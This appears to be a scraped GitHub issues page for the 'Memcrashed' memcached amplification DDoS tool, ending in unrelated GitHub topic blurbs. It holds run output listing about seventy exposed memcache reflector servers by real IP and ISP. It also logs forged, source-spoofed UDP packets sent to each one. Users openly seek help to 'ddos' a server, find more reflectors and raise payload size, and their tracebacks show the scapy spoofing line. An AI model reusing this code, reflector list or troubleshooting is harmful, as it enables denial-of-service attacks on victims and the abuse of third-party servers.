[+] Memcache Server (30) | IP: 149.202.44.25 | OS: None | ISP: OVH SAS |
[+] Memcache Server (31) | IP: 203.122.25.59 | OS: None | ISP: Citycom Networks Pvt |
[+] Memcache Server (32) | IP: 195.161.62.194 | OS: None | ISP: Avguro Technologies Ltd. Hosting service provider |
[+] Memcache Server (33) | IP: 185.12.124.76 | OS: None | ISP: QWARTA LLC |
[+] Memcache Server (34) | IP: 173.212.245.117 | OS: None | ISP: Contabo GmbH |
[+] Memcache Server (35) | IP: 1.60.17.28 | OS: None | ISP: China Unicom Heilongjiang |
[+] Memcache Server (36) | IP: 103.27.237.107 | OS: None | ISP: Long Van System Solution JSC |
[+] Memcache Server (37) | IP: 203.172.121.141 | OS: None | ISP: CS LoxInfo |
[+] Memcache Server (38) | IP: 134.213.30.27 | OS: None | ISP: Rackspace Ltd. |
[+] Memcache Server (39) | IP: 158.69.36.2 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (40) | IP: 72.14.186.34 | OS: None | ISP: Linode |
[+] Memcache Server (41) | IP: 5.39.57.88 | OS: None | ISP: OVH Hosting Limited |
[+] Memcache Server (42) | IP: 81.169.215.229 | OS: None | ISP: Strato AG |
[+] Memcache Server (43) | IP: 209.236.126.69 | OS: None | ISP: PrivateSystems Networks |
[+] Memcache Server (44) | IP: 192.99.25.230 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (45) | IP: 125.34.67.139 | OS: None | ISP: China Unicom Beijing |
[+] Memcache Server (46) | IP: 103.45.13.162 | OS: None | ISP: Shenzhen Qianhai bird cloud computing Co. |
[+] Memcache Server (47) | IP: 23.244.241.138 | OS: None | ISP: Enzu |
[+] Memcache Server (48) | IP: 62.176.2.210 | OS: None | ISP: Rial Com JSC |
[+] Memcache Server (49) | IP: 66.70.223.64 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (50) | IP: 61.9.48.146 | OS: None | ISP: SKYBroadband SKYCable Corporation |
[+] Memcache Server (51) | IP: 37.56.90.63 | OS: None | ISP: SaudiNet |
[+] Memcache Server (52) | IP: 108.61.246.84 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (53) | IP: 23.225.95.252 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (54) | IP: 207.210.68.42 | OS: None | ISP: Global Net Access, LLC |
[+] Memcache Server (55) | IP: 47.88.104.228 | OS: None | ISP: Alibaba |
[+] Memcache Server (56) | IP: 117.54.238.221 | OS: None | ISP: INDO Internet, PT |
[+] Memcache Server (57) | IP: 23.225.95.36 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (58) | IP: 172.247.51.143 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (59) | IP: 139.196.239.43 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (60) | IP: 173.201.27.39 | OS: None | ISP: GoDaddy.com, LLC |
[+] Memcache Server (61) | IP: 54.248.233.245 | OS: None | ISP: Amazon.com |
[+] Memcache Server (62) | IP: 123.30.128.176 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (63) | IP: 133.242.185.90 | OS: None | ISP: SAKURA Internet |
[+] Memcache Server (64) | IP: 113.120.61.246 | OS: None | ISP: China Telecom Shandong |
[+] Memcache Server (65) | IP: 114.7.34.18 | OS: None | ISP: PT Indosat Tbk. |
[+] Memcache Server (66) | IP: 117.103.206.12 | OS: None | ISP: VTC Multimedia Corporation |
[+] Memcache Server (67) | IP: 213.251.187.75 | OS: None | ISP: OVH SAS |
[+] Memcache Server (68) | IP: 220.164.24.38 | OS: None | ISP: China Telecom Yunnan |
[+] Memcache Server (69) | IP: 123.30.128.187 | OS: None | ISP: Vietnam Posts and Telecommunications (VNPT) |
[+] Memcache Server (70) | IP: 172.247.51.58 | OS: Windows 7 or 8 | ISP: CloudRadium L.L.C |
[+] Memcache Server (71) | IP: 151.80.151.179 | OS: None | ISP: OVH SAS |
[+] Memcache Server (72) | IP: 153.122.27.24 | OS: None | ISP: Gmo Cloud K.k. |
[+] Memcache Server (73) | IP: 185.140.12.200 | OS: None | ISP: Majd Ngn Ict Development Pjsc |
[+] Memcache Server (74) | IP: 45.77.44.172 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (75) | IP: 112.137.167.32 | OS: None | ISP: TM-VADS DC Hosting |
[+] Memcache Server (76) | IP: 118.139.178.110 | OS: None | ISP: Virtual Private Hosting Service |
[+] Memcache Server (77) | IP: 109.123.155.96 | OS: None | ISP: Tomsk Polytechnic University |
[+] Memcache Server (78) | IP: 128.101.122.229 | OS: None | ISP: University of Minnesota |
[+] Memcache Server (79) | IP: 69.64.83.135 | OS: None | ISP: Codero |
[+] Memcache Server (80) | IP: 198.23.171.155 | OS: None | ISP: ColoCrossing |
[+] Memcache Server (81) | IP: 54.210.138.147 | OS: None | ISP: Amazon.com |
[+] Memcache Server (82) | IP: 95.158.131.144 | OS: None | ISP: Novatel LTD. |
[+] Memcache Server (83) | IP: 222.216.1.66 | OS: None | ISP: China Telecom Guangxi |
[+] Memcache Server (84) | IP: 181.112.145.251 | OS: None | ISP: Corporacion Nacional De Telecomunicaciones - Cnt E |
[+] Memcache Server (85) | IP: 118.31.71.231 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (86) | IP: 176.53.20.46 | OS: None | ISP: Radore Veri Merkezi Hizmetleri A.S. |
[+] Memcache Server (87) | IP: 111.231.110.149 | OS: None | ISP: Tencent cloud computing |
[+] Memcache Server (88) | IP: 89.175.27.177 | OS: None | ISP: MTS PJSC |
[+] Memcache Server (89) | IP: 198.50.191.110 | OS: None | ISP: OVH Hosting |
[+] Memcache Server (90) | IP: 172.247.51.145 | OS: None | ISP: CloudRadium L.L.C |
[+] Memcache Server (91) | IP: 211.149.200.233 | OS: None | ISP: Chengdu West Dimension Digital Technology Co. |
[+] Memcache Server (92) | IP: 182.253.226.85 | OS: None | ISP: Biznet Networks |
[+] Memcache Server (93) | IP: 176.31.147.158 | OS: None | ISP: OVH SAS |
[+] Memcache Server (94) | IP: 112.4.90.134 | OS: None | ISP: China Mobile |
[+] Memcache Server (95) | IP: 112.124.125.107 | OS: None | ISP: Hangzhou Alibaba Advertising Co.,Ltd. |
[+] Memcache Server (96) | IP: 77.81.164.139 | OS: None | ISP: Voxility S.R.L. |
[+] Memcache Server (97) | IP: 69.175.18.42 | OS: None | ISP: SingleHop |
[+] Memcache Server (98) | IP: 45.77.221.32 | OS: None | ISP: Choopa, LLC |
[+] Memcache Server (99) | IP: 123.31.19.98 | OS: None | ISP: Vietnam Posts and Telecommunications(VNPT) |
[+] Memcache Server (100) | IP: 50.97.148.126 | OS: None | ISP: SoftLayer Technologies |
[*] Ready to engage target ***********? <Y/n>: y
[+] Sending 1 forged UDP packet to: 185.58.205.218
.[+] Sending 1 forged UDP packet to: 114.215.198.32
.[+] Sending 1 forged UDP packet to: 79.98.30.159
.[+] Sending 1 forged UDP packet to: 198.11.234.98
.[+] Sending 1 forged UDP packet to: 51.254.93.89
.[+] Sending 1 forged UDP packet to: 69.50.212.204
.[+] Sending 1 forged UDP packet to: 43.225.158.248
.[+] Sending 1 forged UDP packet to: 23.225.113.65
.[+] Sending 1 forged UDP packet to: 23.244.241.178
.[+] Sending 1 forged UDP packet to: 61.147.124.51
.[+] Sending 1 forged UDP packet to: 109.235.252.151
.[+] Sending 1 forged UDP packet to: 147.52.110.5
.[+] Sending 1 forged UDP packet to: 77.75.124.183
.[+] Sending 1 forged UDP packet to: 164.58.48.5
.[+] Sending 1 forged UDP packet to: 54.37.242.70
.[+] Sending 1 forged UDP packet to: 123.30.157.244
.[+] Sending 1 forged UDP packet to: 42.121.236.117
.[+] Sending 1 forged UDP packet to: 139.199.184.33
.[+] Sending 1 forged UDP packet to: 216.98.10.213
.[+] Sending 1 forged UDP packet to: 185.174.28.89
.[+] Sending 1 forged UDP packet to: 47.75.48.225
.[+] Sending 1 forged UDP packet to: 123.30.191.42
.[+] Sending 1 forged UDP packet to: 91.224.140.37
.[+] Sending 1 forged UDP packet to: 149.56.165.165
.[+] Sending 1 forged UDP packet to: 119.38.160.30
.[+] Sending 1 forged UDP packet to: 123.30.139.46
.[+] Sending 1 forged UDP packet to: 123.31.43.241
.[+] Sending 1 forged UDP packet to: 119.23.21.215
.[+] Sending 1 forged UDP packet to: 115.29.160.192
.[+] Sending 1 forged UDP packet to: 149.202.44.25
.[+] Sending 1 forged UDP packet to: 203.122.25.59
.[+] Sending 1 forged UDP packet to: 195.161.62.194
.[+] Sending 1 forged UDP packet to: 185.12.124.76
.[+] Sending 1 forged UDP packet to: 173.212.245.117
.[+] Sending 1 forged UDP packet to: 1.60.17.28
.[+] Sending 1 forged UDP packet to: 103.27.237.107
.[+] Sending 1 forged UDP packet to: 203.172.121.141
.[+] Sending 1 forged UDP packet to: 134.213.30.27
.[+] Sending 1 forged UDP packet to: 158.69.36.2
.[+] Sending 1 forged UDP packet to: 72.14.186.34
.[+] Sending 1 forged UDP packet to: 5.39.57.88
.[+] Sending 1 forged UDP packet to: 81.169.215.229
.[+] Sending 1 forged UDP packet to: 209.236.126.69
.[+] Sending 1 forged UDP packet to: 192.99.25.230
.[+] Sending 1 forged UDP packet to: 125.34.67.139
.[+] Sending 1 forged UDP packet to: 103.45.13.162
.[+] Sending 1 forged UDP packet to: 23.244.241.138
.[+] Sending 1 forged UDP packet to: 62.176.2.210
.[+] Sending 1 forged UDP packet to: 66.70.223.64
.[+] Sending 1 forged UDP packet to: 61.9.48.146
.[+] Sending 1 forged UDP packet to: 37.56.90.63
.[+] Sending 1 forged UDP packet to: 108.61.246.84
.[+] Sending 1 forged UDP packet to: 23.225.95.252
.[+] Sending 1 forged UDP packet to: 207.210.68.42
.[+] Sending 1 forged UDP packet to: 47.88.104.228
.[+] Sending 1 forged UDP packet to: 117.54.238.221
.[+] Sending 1 forged UDP packet to: 23.225.95.36
.[+] Sending 1 forged UDP packet to: 172.247.51.143
.[+] Sending 1 forged UDP packet to: 139.196.239.43
.[+] Sending 1 forged UDP packet to: 173.201.27.39
.[+] Sending 1 forged UDP packet to: 54.248.233.245
.[+] Sending 1 forged UDP packet to: 123.30.128.176
.[+] Sending 1 forged UDP packet to: 133.242.185.90
.[+] Sending 1 forged UDP packet to: 113.120.61.246
.[+] Sending 1 forged UDP packet to: 114.7.34.18
.[+] Sending 1 forged UDP packet to: 117.103.206.12
.[+] Sending 1 forged UDP packet to: 213.251.187.75
.[+] Sending 1 forged UDP packet to: 220.164.24.38
.[+] Sending 1 forged UDP packet to: 123.30.128.187
.[+] Sending 1 forged UDP packet to: 172.247.51.58
.[+] Sending 1 forged UDP packet to: 151.80.151.179
.[+] Sending 1 forged UDP packet to: 153.122.27.24
.[+] Sending 1 forged UDP packet to: 185.140.12.200
.[+] Sending 1 forged UDP packet to: 45.77.44.172
.[+] Sending 1 forged UDP packet to: 112.137.167.32
.[+] Sending 1 forged UDP packet to: 118.139.178.110
.[+] Sending 1 forged UDP packet to: 109.123.155.96
.[+] Sending 1 forged UDP packet to: 128.101.122.229
.[+] Sending 1 forged UDP packet to: 69.64.83.135
.[+] Sending 1 forged UDP packet to: 198.23.171.155
.[+] Sending 1 forged UDP packet to: 54.210.138.147
.[+] Sending 1 forged UDP packet to: 95.158.131.144
.[+] Sending 1 forged UDP packet to: 222.216.1.66
.[+] Sending 1 forged UDP packet to: 181.112.145.251
.[+] Sending 1 forged UDP packet to: 118.31.71.231
.[+] Sending 1 forged UDP packet to: 176.53.20.46
.[+] Sending 1 forged UDP packet to: 111.231.110.149
.[+] Sending 1 forged UDP packet to: 89.175.27.177
.[+] Sending 1 forged UDP packet to: 198.50.191.110
.[+] Sending 1 forged UDP packet to: 172.247.51.145
.[+] Sending 1 forged UDP packet to: 211.149.200.233
.[+] Sending 1 forged UDP packet to: 182.253.226.85
.[+] Sending 1 forged UDP packet to: 176.31.147.158
.[+] Sending 1 forged UDP packet to: 112.4.90.134
.[+] Sending 1 forged UDP packet to: 112.124.125.107
.[+] Sending 1 forged UDP packet to: 77.81.164.139
.[+] Sending 1 forged UDP packet to: 69.175.18.42
.[+] Sending 1 forged UDP packet to: 45.77.221.32
.[+] Sending 1 forged UDP packet to: 123.31.19.98
.[+] Sending 1 forged UDP packet to: 50.97.148.126
.
[•] Task complete! Exiting Platform. Have a wonderful day.
why only 100 ???
How can i run this script without shodan's api key? I want to use my hosts that i scanned, can someone provide me sample bots.txt file so i know what's the bots.txt file structure? Thanks
I scanned servers by port 11211, and found about 20000 servers, but they are not working. Tell me, how can i find bots by scanning network.
Hello there,
I get this problem when i try to engage the target,
do someone know how to solve it?
Would you like to display all the bots from Shodan? <Y/n>: Y
[*] Ready to engage target 162.13.14.100? <Y/n>: y
Traceback (most recent call last):
File "Memcrashed.py", line 139, in
print('[+] Sending 2 forged synchronized payloads to: %s' % (i))
NameError: name 'i' is not defined
root@kali:~/Desktop/Memcrashed-DDoS-Exploit#
When i say no to display all the bots from shodan it looks he is gonna send bytes, but when i test it
on the test service from vedbex.com nothing happend.
Cheers Klapkaak078
What is the payload
What is this error? How can i solve this?
*] Ready to engage target xxx.xxx.xx.xx? <Y/n>: Y
[+] Sending 2 forged synchronized payloads to: 114.215.114.108
Traceback (most recent call last):
File "Memcrashed.py", line 125, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
File "/home/name/.local/lib/python3.6/site-packages/scapy/sendrecv.py", line 289, in send
socket = conf.L3socket(*args, **kargs)
File "/home/name/.local/lib/python3.6/site-packages/scapy/arch/linux.py", line 407, in init
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
File "/usr/lib/python3.6/socket.py", line 144, in init
_socket.socket.init(self, family, type, proto, fileno)
PermissionError: [Errno 1] Operation not permitted
I want to ddos server but I have problem - ddos bots sends only 64 bytes. I need help with "payload packets". Please.
Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/scapy/fields.py", line 238, in h2i
inet_aton(x)
OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "Memcrashed.py", line 135, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
File "/usr/local/lib/python3.6/dist-packages/scapy/base_classes.py", line 240, in call
i.init(*args, **kargs)
File "/usr/local/lib/python3.6/dist-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/usr/local/lib/python3.6/dist-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x)
File "/usr/local/lib/python3.6/dist-packages/scapy/fields.py", line 240, in h2i
x = Net(x)
File "/usr/local/lib/python3.6/dist-packages/scapy/base_classes.py", line 90, in init
self.parsed,self.netmask = self._parse_net(net)
File "/usr/local/lib/python3.6/dist-packages/scapy/base_classes.py", line 83, in _parse_net
tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -9] Address family for hostname not supported
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.